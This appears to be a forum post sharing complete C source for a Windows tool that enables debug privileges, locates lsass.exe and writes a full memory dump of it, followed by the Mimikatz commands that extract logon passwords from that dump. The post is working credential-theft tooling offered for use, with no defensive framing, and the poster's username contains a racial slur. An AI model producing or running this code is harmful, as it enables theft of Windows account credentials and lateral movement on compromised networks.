/CODE/lsass mem dump for mimikatz

[lilbossnigga]

Code:

//lsass mem dump

//

//coded by sasami_327

////////////////////////////////////////////////////////

#include <Windows.h>

#include <DbgHelp.h>

#include <stdio.h>

#include <TlHelp32.h>

#pragma comment(lib, "dbghelp")

#define CWA(dll, api)	::api

BOOL EnableSeDebugPrivilege(VOID)

{

	HANDLE token = NULL;

	LUID luid, *pluid;

	TOKEN_PRIVILEGES tokenPriv, *ptokenPriv;

	BOOL ret = FALSE;

	if ( CWA(kernel32, OpenProcessToken)(CWA(kernel32, GetCurrentProcess()), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &token) )

	{

		printf("Successfully OpenProcessToken\n");

		pluid = &luid;

		if ( CWA(kernel32, LookupPrivilegeValueA(NULL, "SeDebugPrivilege", pluid)) )

		{

			printf("Successfully LookupPrivilegeValueA\n");

			ptokenPriv = &tokenPriv;

			ptokenPriv->PrivilegeCount = 1;

			ptokenPriv->Privileges[0].Luid = luid;

			ptokenPriv->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

			if ( AdjustTokenPrivileges(token, FALSE, ptokenPriv, 0, 0, NULL) )

			{

				printf("Successfully AdjustTokenPrivileges\n");

				ret = TRUE;

			}

			else

			{

				printf("Failed to AdjustTokenPrivileges with error=%d\n", GetLastError());

			}

		}

		else

		{

			printf("Failed to LookupPrivilegeValueA with error=%d\n", GetLastError());

		}

		CWA(kernel32, CloseHandle)(token);

	}

	else

	{

		printf("Failed to OpenProcessToken with error=%d\n", GetLastError());

	}

	return(ret);

}

VOID dump(DWORD pid)

{

	HANDLE process = NULL;

	HANDLE file = NULL;

	if ( ( process = CWA(kernel32, OpenProcess)(PROCESS_QUERY_INFORMATION|PROCESS_VM_  READ, FALSE, pid) ) )

	{

		if ( INVALID_HANDLE_VALUE != ( file = CWA(kernel32, CreateFileA)("lsass.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ) )

		{

			if ( CWA(dbghelp, MiniDumpWriteDump)(

											process,

											pid,

											file,

											MiniDumpWithFullMemory,

											NULL,

											NULL,

											NULL

											) )

			{

				printf("OK\n");

			}

			CWA(kernel32, CloseHandle)(file);

		}

		CWA(kernel32, CloseHandle)(process);

	}

}

DWORD GetPIDByProcessName(char* procName)

{

	DWORD retPID = -1;

	PROCESSENTRY32 pEntry32, *ppEntry32;

	HANDLE snapshot = NULL;

	if ( INVALID_HANDLE_VALUE != (snapshot = CWA(kernel32, CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0)) )

	{

		ppEntry32 = &pEntry32;

		ppEntry32->dwSize = sizeof(pEntry32);

		if ( CWA(kernel32, Process32First(snapshot, ppEntry32)) )

		{

			for ( ; ; )

			{

				if ( !strcmp(procName, ppEntry32->szExeFile) )

				{

					retPID = ppEntry32->th32ProcessID;

					break;

				}

				if ( !CWA(kernel32, Process32Next(snapshot, ppEntry32)) )

				{

					if ( ERROR_NO_MORE_FILES == GetLastError() )

					{

						break;

					}

				}

			}

		}

		CWA(kernel32, CloseHandle)(snapshot);

	}

	return(retPID);

}

int main(int argc, char* argv[])

{

	DWORD lsass = GetPIDByProcessName("lsass.exe");

	if ( -1 != lsass )

	{

		printf("lsass=%d\n", lsass);

		if ( EnableSeDebugPrivilege() )

		{

			dump(lsass);

		}

	}

	return(0);

}

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords